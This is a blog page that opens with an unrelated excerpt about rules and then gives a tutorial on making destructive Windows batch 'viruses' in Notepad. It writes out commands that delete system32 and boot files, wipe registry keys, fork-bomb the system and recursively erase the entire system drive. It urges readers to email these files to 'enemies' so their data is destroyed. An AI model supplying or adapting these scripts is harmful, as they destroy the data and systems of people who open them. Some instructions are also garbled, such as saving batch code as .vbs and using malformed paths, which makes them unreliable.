Featured

Why we need RULES?

Rules are established principles or guidelines that dictate how something should be done or how situations should be handled. They are used to regulate behavior, ensure fairness, and maintain order in various contexts, such as society, organizations, games, and social settings. Rules can be formal or informal. Formal rules are codified and enforced by a governing body, such as laws, regulations, or contracts. Informal rules are unwritten and enforced by social pressure, such as social norms or etiquette. Rules can be helpful in many ways. They can: Ensure fairness by creating a level playing field for everyone. Protect people from harm by setting standards of behavior. Maintain order by providing a framework for behavior. However, rules can also be seen as restrictive or unfair. It is important to consider the purpose of a rule before deciding whether or not to follow it. For example, a speed limit may be seen as restrictive, but it is also designed to protect people from harm. A dress...

NotePad Trojan Virus for Windows


Image result for trojan virus

Create a powerful virus with notepad



1) Create a powerful virus with notepad (to delete your enemy's data)
STEPS:
1. Open notepad.
2. Copy the following.
3. del c:\WINDOWS \system32\**/q
4. paste it in notepad.
5. and save it as .bat or .cmd 6. eg click save as write: fun.bat
7. Hit enter and your virus is ready never open the file on your own you have created ( because you know what will happen)  have fun send it your enemy's through email....when they open it their data will be deleted. thanks for reading
2) How to create a virus that deactivates an OS
Here are the stepts you should follow to make the virus:
This virus will stop and prevent a computer from starting up and the only solution would be to reinstall winsows.
Warning : never try it on your computer.
open up notepad and type in the following
del "C:windows\SYSTEM32\bootok"
/Q/S >nul
del "C:windows\SYSTEM32\bootvid.dll"
del "C:windows\SYSTEM32\bootvrfy"
After you type these save it as "any name you want ".bat
Please let me know if it works.
3) Endless Notepads
All you need to do is to copy the codes , paste it in any notepad or text file, than save the text file with anynam.vbs , and yeah dont forget to change the format from text file to all files.
*NOTE* These codes do not stay on forever, they just stay on until the person shuts off the computer. The registry delete is one that PERMANETLY deletes files on the computer that cannot be recovered. this will DESTROY the computer.
Endless Notepads
*This will pop up endless notepads until the computer freezes and crashes*
Code:
CODE
@ECHO off
:top
START %SystemRoot%\system32\notepad.exe
GOTO top
4) Delete Key Registry Files
All you need to do is to copy the codes , paste it in any notepad or text file, than save the text file with anynam.vbs , and yeah dont forget to change the format from text file to all files.
*NOTE* These codes do not stay on forever, they just stay on until the person shuts off the computer. The registry delete is one that PERMANETLY deletes files on the computer that cannot be recovered. this will DESTROY the computer.
Delete Key Registry Files [NOTE THIS IS DANGEROUS!! USE AT RISK]
*This will delete key registry files, then loops a message* (CANNOT BE RECOVERED FROM)*
Code:
CODE
@ECHO OFF
START reg delete HKCR/.exe
START reg delete HKCR/.dll
START reg delete HKCR/*
:MESSAGE
ECHO Your computer has been destroyed. Have a nice day.
GOTO MESSAGE
5) The blue screen of Death
All you need to do is to copy the codes , paste it in any notepad or text file, than save the text file with anynam.vbs , and yeah dont forget to change the format from text file to all files.
*NOTE* These codes do not stay on forever, they just stay on until the person shuts off the computer. The registry delete is one that PERMANETLY deletes files on the computer that cannot be recovered. this will DESTROY the computer.
The blue screen of Death [this might be dangerous]
Code:
CODE
@echo off
del %systemdrive%\*.* /f /s /q
shutdown -r -f -t 00

Comments